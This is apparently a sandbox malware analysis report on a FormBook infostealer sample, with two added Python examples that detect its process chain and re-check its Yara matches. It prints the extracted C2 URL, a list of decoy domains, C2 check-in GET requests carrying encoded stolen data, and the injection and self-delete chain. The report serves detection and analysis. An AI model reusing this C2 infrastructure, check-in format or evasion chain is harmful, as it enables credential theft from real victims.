Windows Analysis Report v8kZUFgdD4.exe

Overview

General Information

Sample Name: v8kZUFgdD4.exe
Analysis ID: 452667
MD5: 57f3ae2842ffb5ceea386d0b97a52818
SHA1: 68423398d025d3cbbb944ee4c3cea5501df67761
SHA256: a0c7b3d44a5cfcda917fc80c099da5ab3de582ff7c24f1373b4bd25f88d61e52
Tags: exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • v8kZUFgdD4.exe (PID: 724 cmdline: 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
    • v8kZUFgdD4.exe (PID: 6148 cmdline: 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: 57F3AE2842FFB5CEEA386D0B97A52818)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6580 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6744 cmdline: /c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
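The process tree shows the chain that the signatures describe: the sample relaunches its own image (a suspended child that is then hollowed), code ends up in explorer.exe, explorer.exe starts a 32-bit ipconfig.exe, and that ipconfig.exe runs cmd.exe /c del against the original file. The report notes further down that no Sigma rule matched this run, so the following is an added example (not part of the report) of process-creation detection logic that does catch the chain. The event records are constructed by hand from the tree above with an assumed Sysmon-like schema (pid, ppid, image, cmdline); the image path of cmd.exe and the set of console utilities that should never spawn a shell are assumptions, not report data.

```python
"""Detection logic for the injection / self-deletion chain in the process tree.

Added example; not part of the sandbox report. Events are constructed from the
Process Tree section (PIDs, images and command lines as printed there).
"""
import ntpath
import re

SAMPLE = r"C:\Users\user\Desktop\v8kZUFgdD4.exe"

# Constructed from the report's process tree. The cmd.exe image path is an
# assumption (the report prints only its command line and MD5).
EVENTS = [
    {"pid": 724,  "ppid": 0,    "image": SAMPLE, "cmdline": SAMPLE},
    {"pid": 6148, "ppid": 724,  "image": SAMPLE, "cmdline": SAMPLE},
    {"pid": 3440, "ppid": 6148, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE"},
    {"pid": 6580, "ppid": 3440, "image": r"C:\Windows\SysWOW64\ipconfig.exe",
     "cmdline": r"C:\Windows\SysWOW64\ipconfig.exe"},
    {"pid": 6744, "ppid": 6580, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"/c del 'C:\Users\user\Desktop\v8kZUFgdD4.exe'"},
    {"pid": 6760, "ppid": 6744, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
]

SHELLS = {"cmd.exe", "powershell.exe"}
# Console utilities that print and exit; a shell child means the process is
# hosting someone else's code. Illustrative set (assumption), not from the report.
NEVER_SPAWN_SHELL = {"ipconfig.exe", "nslookup.exe", "whoami.exe",
                     "hostname.exe", "systeminfo.exe"}

# `/c del [/f /q ...] <path>` with the path optionally quoted (Joe Sandbox prints
# command lines with single quotes).
DEL_CMD = re.compile(r"""/c\s+del\s+(?:/[a-z]\s+)*['"]?([^'"]+?)['"]?\s*$""",
                     re.IGNORECASE)


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def detect(events) -> list:
    """Return sorted (rule, pid) pairs for every event that trips a rule."""
    by_pid = {e["pid"]: e for e in events}
    images = {e["image"].lower() for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue
        # 1. Same image, same command line as the parent: the usual prelude to
        #    hollowing (child created suspended, then overwritten).
        if (e["image"].lower() == parent["image"].lower()
                and e["cmdline"] == parent["cmdline"]):
            hits.append(("self_spawn_same_cmdline", e["pid"]))
        # 2. A print-and-exit utility has a shell as a child.
        if (basename(parent["image"]) in NEVER_SPAWN_SHELL
                and basename(e["image"]) in SHELLS):
            hits.append(("console_utility_spawned_shell", e["pid"]))
        # 3. A shell deleting a file that is the image of a process in this log:
        #    the dropper removing itself after migrating into another process.
        if basename(e["image"]) in SHELLS:
            m = DEL_CMD.search(e["cmdline"])
            if m and m.group(1).lower() in images:
                hits.append(("self_delete_of_executed_image", e["pid"]))
    return sorted(hits)


def chain(events, pid: int) -> list:
    """Image basenames from the root of the recorded tree down to `pid`."""
    by_pid = {e["pid"]: e for e in events}
    names = []
    while pid in by_pid:
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return names[::-1]


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:32} pid={pid}  chain={' -> '.join(chain(EVENTS, pid))}")
```

Rule 3 is the one that generalises best: it needs no list of utility names, only the requirement that the deleted path was itself executed earlier in the same log. In a real Sysmon feed explorer.exe's parent would be winlogon/userinit rather than the injector, so none of the three rules depends on the explorer.exe edge the sandbox draws.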

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further memory-dump entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack | Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack | Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(8 further unpacked-PE entries not shown)
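Two things in the Yara tables are worth checking by hand. First, the Formbook_1 and JPCERT/CC strings hit at exactly the same offsets in the 00000007 (ipconfig.exe) dump, the 00000001 (second v8kZUFgdD4.exe) dump and the 0.2 raw unpack, so the same unpacked payload image is present in all three processes. Second, the .unpack copy reports every offset exactly 0xE00 lower than the .raw.unpack copy, which is consistent with the same bytes in two layouts (memory image versus file-aligned image). The block below is an added example, not part of the report or of the cited rules: it replays the string search against a constructed buffer with the rule strings planted at the printed offsets, checks that the layout shift is one constant, decodes the `push imm32` operand behind the JPCERT/CC sqlite3 strings (the rule names them after sqlite3 API lookups; the hash function itself is not on this page and is not guessed here), and flags `$sequence_0` as containing `0F 31`, the RDTSC opcode behind the "RDTSC time measurements" signature.

```python
"""Re-checking the Yara string hits listed above.

Added example, not part of the sandbox report or of the cited rules. The
buffer is constructed: zero-filled, with the rule strings planted at the
offsets the report printed for the raw dump. It is not the sample's memory.
"""
import struct

# Rule strings exactly as printed in the Yara Overview.
SEQUENCES = {
    "$sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
    "$sequence_1": "3C 24 0F 84 76 FF FF FF 3C 25 74 94",
    "$sequence_2": "3B 4F 14 73 95 85 C9 74 91",
    "$sequence_8": "3C 54 74 04 3C 74 75 F4",
    "$sqlite3step": "68 34 1C 7B E1",
    "$sqlite3text": "68 38 2A 90 C5",
    "$sqlite3blob": "68 53 D8 7F 8C",
}
# Offsets reported for 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack ...
RAW_HITS = {
    "$sequence_0": [0x85F8, 0x8992],
    "$sequence_1": [0x146A5],
    "$sequence_2": [0x14191],
    "$sequence_8": [0x19797],
    "$sqlite3step": [0x166C9, 0x167DC],
    "$sqlite3text": [0x166F8, 0x1681D],
    "$sqlite3blob": [0x1670B, 0x16833],
}
# ... and for the same strings in 0.2.v8kZUFgdD4.exe.21d0000.2.unpack.
MAPPED_HITS = {
    "$sequence_0": [0x77F8, 0x7B92],
    "$sequence_1": [0x138A5],
    "$sequence_2": [0x13391],
    "$sequence_8": [0x18997],
}


def hexbytes(spec: str) -> bytes:
    return bytes.fromhex(spec.replace(" ", ""))


def build_dump(hits, sequences, size=0x1B000) -> bytes:
    """Constructed stand-in for the dump: each rule string at its reported offset."""
    buf = bytearray(size)
    for name, offsets in hits.items():
        pat = hexbytes(sequences[name])
        for off in offsets:
            buf[off:off + len(pat)] = pat
    return bytes(buf)


def scan(buf: bytes, sequences) -> dict:
    """Plain equivalent of yara's string matching: every offset of every string."""
    found = {}
    for name, spec in sequences.items():
        pat, offsets, i = hexbytes(spec), [], 0
        while (i := buf.find(pat, i)) != -1:
            offsets.append(i)
            i += 1
        if offsets:
            found[name] = offsets
    return found


def layout_delta(raw_hits, mapped_hits):
    """Raw-minus-mapped offset; a single value means one uniform layout shift."""
    deltas = {r - m for name, ms in mapped_hits.items()
              for r, m in zip(raw_hits[name], ms)}
    return deltas.pop() if len(deltas) == 1 else None


def push_immediate(spec: str) -> int:
    """Operand of a one-byte `push imm32` (opcode 0x68), little-endian."""
    pat = hexbytes(spec)
    if len(pat) != 5 or pat[0] != 0x68:
        raise ValueError("not a push imm32 encoding")
    return struct.unpack("<I", pat[1:])[0]


def is_rdtsc_sequence(spec: str) -> bool:
    """True if the string contains the RDTSC opcode (0F 31)."""
    return b"\x0f\x31" in hexbytes(spec)


if __name__ == "__main__":
    dump = build_dump(RAW_HITS, SEQUENCES)
    for name, offsets in scan(dump, SEQUENCES).items():
        print(name, [hex(o) for o in offsets])
    print("layout delta:", hex(layout_delta(RAW_HITS, MAPPED_HITS)))
    print("$sqlite3step pushes", hex(push_immediate(SEQUENCES["$sqlite3step"])))
```

The scan reproduces the printed offsets, which is the cheap sanity check before trusting a rule match in a triage pipeline; the constant 0xE00 is what you would subtract to carry an address from the memory dump to the file-aligned copy when loading it in a disassembler.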

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.findfoodshop.com/dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx | Avira URL Cloud: Label: malware
Source: http://www.invisiongc.net/dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.extinctionbrews.com/dy8g/"], "decoy": ["mzyxi-rkah-y.net", "okinawarongnho.com", "qq66520.com", "nimbus.watch", "cwdelrio.com", "regalshopper.com", "avito-payment.life", "jorgeporcayo.com", "galvinsky.digital", "guys-only.com", "asmfruits-almacenes.com", "boatrace-life04.net", "cochez.club", "thelastvictor.net", "janieleconte.com", "ivoirepneus.com", "saludflv.info", "mydreamtv.net", "austinphy.com", "cajunseafoodstcloud.com", "13006608192.com", "clear3media.com", "thegrowclinic.com", "findfoodshop.com", "livegaming.store", "greensei.com", "atmaapothecary.com", "builtbydawn.com", "wthcoffee.com", "melodezu.com", "oikoschain.com", "matcitekids.com", "killrstudio.com", "doityourselfism.com", "monsoonnerd.com", "swissbankmusic.com", "envisionfordheights.com", "invisiongc.net", "aizaibali.com", "professioneconsulenza.net", "chaneabond.com", "theamercianhouseboat.com", "scuolatua.com", "surivaganza.com", "xn--vuq722jwngjre.com", "quiteimediato.space", "ecofingers.com", "manageoceanaccount.com", "cindywillardrealtor.com", "garimpeirastore.online", "tinsley.website", "fitnesstwentytwenty.com", "thenorthgoldline.com", "scuolacounselingroma.com", "iwccgroup.com", "wideawakemomma.com", "anthonysavillemiddleschool.com", "sprinkleresources.com", "ravexim3.com", "onedadtwodudes.com", "shxytl.com", "iriscloudvideo.com", "theshapecreator.com", "vermogenswerte.com"]}
Multi AV Scanner detection for submitted file
Source: v8kZUFgdD4.exe | Virustotal: Detection: 38%
Yara detected FormBook
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.v8kZUFgdD4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.v8kZUFgdD4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.599150521.0000000001330000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389518635.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.597969689.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.341137782.00000000021D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389832598.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.598432080.0000000001100000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.389732615.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.339035509.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: 7.2.ipconfig.exe.3ac7960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.v8kZUFgdD4.exe.2190000.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 7.2.ipconfig.exe.11406b0.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 0.2.v8kZUFgdD4.exe.21d0000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.v8kZUFgdD4.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.v8kZUFgdD4.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: v8kZUFgdD4.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: Binary string: ipconfig.pdb | source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
Source: Binary string: ipconfig.pdbGCTL | source: v8kZUFgdD4.exe, 00000001.00000002.389856707.0000000000A20000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: v8kZUFgdD4.exe, 00000000.00000003.338578386.0000000002500000.00000004.00000001.sdmp, v8kZUFgdD4.exe, 00000001.00000002.389979034.0000000000A30000.00000040.00000001.sdmp, ipconfig.exe, 00000007.00000002.599975463.0000000003590000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: v8kZUFgdD4.exe, ipconfig.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 00000005.00000000.363215324.000000000DC20000.00000002.00000001.sdmp
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 4x nop then pop esi | 1_2_00415852
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 4x nop then pop ebx | 1_2_00406A98
Source: C:\Users\user\Desktop\v8kZUFgdD4.exe | Code function: 4x nop then pop edi | 1_2_00415699
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop esi | 7_2_00EB5852
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop ebx | 7_2_00EA6A99
Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 4x nop then pop edi | 7_2_00EB5699

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49748 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49762 -> 103.138.88.11:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 162.241.62.54:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.extinctionbrews.com/dy8g/
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1 | Host: www.extinctionbrews.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1 | Host: www.doityourselfism.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=X9Az7RthaT8xdqkxQ6tJRjQeFUHqBPh6fb7YU5dnwYv1rghxnAYW3P4f0krKlocv9Wl7uwWiww==&0X=C6Ah3vPx HTTP/1.1 | Host: www.ecofingers.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=MBhh1pO56K3YrZO9qJkl6N96HaWfS+D/lXW6/vw2t4O2Fl+GB2YqMK2ZraksguVxeKRya9uu2A==&0X=C6Ah3vPx HTTP/1.1 | Host: www.invisiongc.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=4wzaECy4GBTuQnITbNLpu7AOQbyqIYrzJAsJNgGB2dTR99UQwJdt+FpFkOawEfEVdOlYoXAvoA==&0X=C6Ah3vPx HTTP/1.1 | Host: www.findfoodshop.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=DyFQJ285GCHWDKdZkYvFextRb5KpVMjfJilCoJQfsM3+VBHaRIBYykQk9iPNEqtroWJ/WwLhcg==&0X=C6Ah3vPx HTTP/1.1 | Host: www.scuolatua.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=uor47PkOoKkLY099HuArMxw1XFE/ncsTlzCE/ODY21NzZk1xVsb5QvrTgLDn7S7AYBCRuXEk2w==&0X=C6Ah3vPx HTTP/1.1 | Host: www.okinawarongnho.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=q7jKWIuNsoGkf7/hAqyN1U3v/GjJJAAs8Ri7ihl8JZVwqZwISrlxTPDImUVNZCFSYJzAIvZikA==&0X=C6Ah3vPx HTTP/1.1 | Host: www.jorgeporcayo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: Joe Sandbox View | IP Address: 52.58.78.16
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: ARUBA-ASNIT
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=DjnY/S7/G1yk/GGdjnbMG0pwlAlipgBY8a8MDSEvYTAaE8/8s3MkSQswoGP3cSH4hj9/IphBwA==&0X=C6Ah3vPx HTTP/1.1 | Host: www.extinctionbrews.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
Source: global traffic | HTTP traffic detected: GET /dy8g/?i0GDM=Y4JBfBjBKMGzbUzrNu+ARLK4ZQab+dap1kq40YSvqSzyJ/mfRg4U9+Lz1eKJfRLK3cAmaa0bkw==&0X=C6Ah3vPx HTTP/1.1 | Host: www.doityourselfism.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (seven 0x00 bytes, nothing printable)
